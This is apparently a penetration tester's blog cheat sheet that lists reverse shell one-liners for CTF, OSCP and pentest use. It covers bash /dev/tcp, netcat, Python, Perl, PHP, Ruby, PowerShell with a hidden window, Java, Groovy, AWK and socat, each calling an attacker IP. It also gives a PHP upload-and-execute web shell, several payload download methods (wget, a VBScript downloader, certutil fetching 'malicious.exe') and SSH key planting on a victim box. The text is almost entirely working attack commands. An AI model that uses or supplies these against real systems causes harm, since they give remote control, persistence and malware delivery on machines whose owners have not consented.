She sells seas shells by the sea shore
If you are taking part in catch the flag competitions, OSCP (like me) or lucky enough to get a shell on a victim box during an active penetration test engagement, here is a list of useful one-liner reverse shells, but be warned, as I started to write this post it has become slightly more than just reverse shells and has deviated to include file transfer methods as you will usually want to do both.
I will be actively adding to this list so feel free to bookmark or contribute.
AWK Reverse shell
awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Socat Reverse shell
# Attack box
socat file:`tty`,raw,echo=0 tcp-listen:4444
# Victim box (interactive TTY shell)
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4444
Powershell Reverse shell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("ip-address",port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Bash Reverse shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl Reverse shell
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python Reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP Reverse shell’s
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Simple PHP shell to get a file onto a server and then to execute the file
if (isset($_REQUEST['fupload'])) {
file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.0.0.1:1234/" . $_REQUEST['fupload']));
};
if (isset($_REQUEST['fexec'])) {
echo shell_exec($_REQUEST['fexec']);
};
Ruby Reverse shell
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat Reverse shell
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
#Upgrade to tty shell (can be used for most of these commands, personally most often used with netcat)
python -c 'import pty; pty.spawn("/bin/bash")'
Java Reverse shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Groovy Reverse shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Python local server / file transfer
Because when you get a shell usually you want to get something up there, python is my usual go to for spinning up a quick server to wget a file (assuming your IP is 192.168.0.10 and you have a file called malicious.sh in the folder you executed the python server from ).
# <= Python 2
python -m SimpleHTTPServer 8000# >= Python 3
python3 -m http.server 8000And retrieve the file using wget on Linux
wget http://192.168.0.10:8000/malicious.sh
Or Windows as it doesnt have wget you need to create a Visual Basic script which does the same (old/OSCP way see CertUtil after), so copy and paste this into a terminal be sure to press enter another time to execute the last line and actually write the script to the system.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs # then still on the victim machine use cscript to execute the vbscript "wget.vbs" to download the file:
cscript wget.vbs http://192.168.0.10:8000/malicious.exe malicious.exe
Or if possible… save yourself some hassel and “live off the land” with this slick 1 liner. You can use Certutil to download files (source):
certutil -urlcache -f http://192.168.0.10:8000/malicious.exe malicious.exe
Rsync’ing files/folders between Linux servers.
Not necessarily reverse shell but a quick and dirty method thats useful for transferring files cross server once a foothold has been attained.
# attack box
ssh-keygen -t rsa -b 4096 -C "[email protected]" -f ~/.ssh/id_rsa_hacker# attack box (set correct permissions on the private key)
chmod 600 ~/.ssh/id_rsa_hacker# cat and copy the contents of your new SSH public key i.e id_rsa_hacker.pub, then switch to the victim box and append to the end of the authorized_hosts file.
cat ~/.ssh/id_rsa_hacker.pubYou can now ssh freely one way (provided everything went smoothly), for 2 way access repeat the process the other way.
# To upload any file or folder use the following changing _PORT_/_FILE2TRANSFER_/_VICTIM_USER_/_VICTIM_IP_ etc as needs be
rsync -rvz -e 'ssh -p _PORT_ -i ~/.ssh/id_rsa_hacker' --progress _FILE2TRANSFER_ _VICTIM_USER_@_VICTIM_IP_:~/
